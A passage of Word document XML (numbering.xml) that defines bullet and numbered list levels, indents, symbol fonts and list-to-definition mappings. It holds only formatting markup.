      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="417C892E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="210E7A5A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="71264316" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F7C85430" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="076E3EDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3CA4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37C5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F62A26C"/>
    <w:lvl w:ilvl="0" w:tplc="1D6E5BCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1532628A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DF7414D2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0CA448D4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6E22819E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="32069BF2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="28BE60FE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="63C62592" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C50A8378" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09512542"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2ACE924C"/>
    <w:lvl w:ilvl="0" w:tplc="32CE8E92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="076054E6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5946284A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F1D6419C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="72524BA0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9CECB38E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CABAE868" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="89286BBA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="383E1E38" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9000" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11121DAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="933C0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5E3D62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="426ED74A"/>
    <w:lvl w:ilvl="0" w:tplc="32B83CA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2514BF28" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FA4AA9DC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F2847B84" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E320CDDE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="46E88C80" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7E72639E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2A0EA18E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="68B8CE80" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="17A12AC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08D2D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54DC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADA4F65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BB3513D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD9A59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F17730F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B97674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427FC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A2431F0"/>
    <w:lvl w:ilvl="0" w:tplc="A1BC3B5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6E68EC0A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D5CC8A56" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A53A0A9C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="64045C44" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2F180168" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="60169F3A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FEEAEA2A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F36E6378" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A523CCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48263EE2"/>
    <w:lvl w:ilvl="0" w:tplc="FAD082CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2AEAC00C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="310886AA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="AD62338E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5760670C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CF9E5F40" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A2844512" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4F62E6FA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8BBC1504" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="35720606"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="648A89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6691C74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7E4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97C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA4CED9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4D09C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8084A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9B751F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA4C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174738"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0558678A"/>
    <w:lvl w:ilvl="0" w:tplc="5CFA43EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C5108018">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9FAC28D4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C016AA4C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B9C8AA6C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5C280422" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C5EA4BD6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E828E3CE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="02689F18" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5BA46D81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53A0A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D17CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="959A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169F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9767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D558F7"/>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5E3098D"/>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EC6E2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05D2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57EB5"/>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2A11EF"/>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89423CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9350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3771C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34422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459345">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="943420220">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1307778227">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="179399477">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1771926285">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1507328887">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1175800143">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="997269300">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1869294881">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1533112726">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1410889122">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1785688284">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1095514520">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1992635374">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="944189428">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="519705859">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1000622284">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="490099929">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1298758074">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1162740168">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="569730438">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1879076883">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="609778989">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="840655966">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="488400956">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="989753139">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="570844534">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="355547681">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="53014979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2E"/>
    <w:rsid w:val="00033EC8"/>
    <w:rsid w:val="00055045"/>
    <w:rsid w:val="00056C3E"/>
    <w:rsid w:val="000950D9"/>
    <w:rsid w:val="000A4289"/>
